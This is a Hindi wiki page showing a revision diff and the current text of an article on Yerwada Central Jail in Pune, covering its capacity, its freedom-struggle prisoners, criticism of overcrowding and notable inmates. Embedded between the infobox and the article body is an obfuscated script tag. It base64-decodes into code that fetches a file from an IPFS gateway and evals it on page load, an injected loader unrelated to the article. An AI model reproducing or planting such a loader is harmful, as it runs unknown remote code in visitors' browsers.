Difference between revisions of "यरवदा केन्द्रीय कारागार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''यरवदा केन्द्रीय कारागार''' अथवा '''यरवदा सेंट्रल जेल''...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
'''यरवदा केन्द्रीय कारागार''' अथवा '''यरवदा सेंट्रल जेल''' ([[अंग्रेज़ी]]: ''Yerwada Central Jail'') [[महाराष्ट्र]] के [[यरवदा]] नगर में स्थित है। यह [[महाराष्ट्र]] का सबसे बड़ा और उच्च-सुरक्षा वाला कारागार होने के साथ दक्षिण एशिया मे स्थित बड़े कारागारों में से एक है।
+
{{सूचना बक्सा संक्षिप्त परिचय
 
+
|चित्र=Yerwada-Central-Jail.jpg
 +
|चित्र का नाम=यरवदा केन्द्रीय कारागार
 +
|विवरण=यह [[महाराष्ट्र]] का सबसे बड़ा और उच्च-सुरक्षा वाला कारागार होने के साथ दक्षिण [[एशिया]] में स्थित बड़े कारागारों में से एक है। 
 +
|शीर्षक 1=स्थान
 +
|पाठ 1= [[पुणे]], [[महाराष्ट्र]]
 +
|शीर्षक 2=सुरक्षा वर्ग
 +
|पाठ 2=अधिकतम
 +
|शीर्षक 3=क्षमता
 +
|पाठ 3=3,600 (2005 के अनुसार)
 +
|शीर्षक 4=स्थिति
 +
|पाठ 4= चालू है
 +
|शीर्षक 5=प्रबंधन
 +
|पाठ 5=महाराष्ट्र सरकार
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=
 +
|अन्य जानकारी= [[1930]] और [[1940]] के दशक में [[भारतीय स्वतंत्रता संग्राम]] के दौरान यहाँ कई प्रसिद्ध हस्तियों जैसे कि [[महात्मा गाँधी]] को इस कारागार में रखा गया था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''यरवदा केन्द्रीय कारागार''' अथवा '''यरवदा सेंट्रल जेल''' ([[अंग्रेज़ी]]: ''Yerwada Central Jail'') [[महाराष्ट्र]] के [[पुणे]] नगर में स्थित है। यह [[महाराष्ट्र]] का सबसे बड़ा और उच्च-सुरक्षा वाला कारागार होने के साथ दक्षिण [[एशिया]] में स्थित बड़े कारागारों में से एक है। 
 +
==विशेषताएँ==
 +
* 12 एकड़ क्षेत्र में फैला यह कारागार दक्षिण एशिया के सबसे बड़े कारागारों में से एक है और यहां की बंदी क्षमता 3600 बंदियों (वर्ष 2005 के अनुसार) की है।
 +
* यह कई सुरक्षा क्षेत्रों और बैरकों में फैला है। यहां एक खुला-कारागार भी है जो ठीक इसके परिसर के बाहर स्थित है।
 +
* [[1930]] और [[1940]] के दशक में [[भारतीय स्वतंत्रता संग्राम]] के दौरान यहां कई प्रसिद्ध हस्तियों जैसे कि [[महात्मा गाँधी]] को इस कारागार में रखा गया था।
 +
* परिसर में स्थित उच्च सुरक्षा कारागार चार ऊँची दीवारों से सुरक्षित है।
 +
* इसमें अंडाकार कक्ष भी हैं जिनमें उच्च सुरक्षा प्राप्त बंदियों को रखा जाता है।  
 +
* क्षमता से अधिक बंदी रखने और उनकी खराब जीवन स्थिति के लिए इस कारागार की आलोचना की जाती है और इस संदर्भ में वर्ष [[2003]] में महाराष्ट्र के मानवाधिकार आयोग ने एक नोटिस भी जारी किया था।
 +
* वर्ष [[2007]] में फ़िल्म अभिनेता [[संजय दत्त]] को भी इस कारागार में रखा गया था।
  
  

Latest revision as of 14:31, 25 March 2015

yaravada kendriy karagar
vivaran yah maharashtr ka sabase b da aur uchch-suraksha vala karagar hone ke sath dakshin eshiya mean sthit b de karagaroan mean se ek hai.
sthan pune, maharashtr
suraksha varg adhikatam
kshamata 3,600 (2005 ke anusar)
sthiti chaloo hai
prabandhan maharashtr sarakar
any janakari 1930 aur 1940 ke dashak mean bharatiy svatantrata sangram ke dauran yahaan kee prasiddh hastiyoan jaise ki mahatma gaandhi ko is karagar mean rakha gaya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

yaravada kendriy karagar athava yaravada seantral jel (aangrezi: Yerwada Central Jail) maharashtr ke pune nagar mean sthit hai. yah maharashtr ka sabase b da aur uchch-suraksha vala karagar hone ke sath dakshin eshiya mean sthit b de karagaroan mean se ek hai.

visheshataean

  • 12 ek d kshetr mean phaila yah karagar dakshin eshiya ke sabase b de karagaroan mean se ek hai aur yahaan ki bandi kshamata 3600 bandiyoan (varsh 2005 ke anusar) ki hai.
  • yah kee suraksha kshetroan aur bairakoan mean phaila hai. yahaan ek khula-karagar bhi hai jo thik isake parisar ke bahar sthit hai.
  • 1930 aur 1940 ke dashak mean bharatiy svatantrata sangram ke dauran yahaan kee prasiddh hastiyoan jaise ki mahatma gaandhi ko is karagar mean rakha gaya tha.
  • parisar mean sthit uchch suraksha karagar char ooanchi divaroan se surakshit hai.
  • isamean aandakar kaksh bhi haian jinamean uchch suraksha prapt bandiyoan ko rakha jata hai.
  • kshamata se adhik bandi rakhane aur unaki kharab jivan sthiti ke lie is karagar ki alochana ki jati hai aur is sandarbh mean varsh 2003 mean maharashtr ke manavadhikar ayog ne ek notis bhi jari kiya tha.
  • varsh 2007 mean film abhineta sanjay datt ko bhi is karagar mean rakha gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh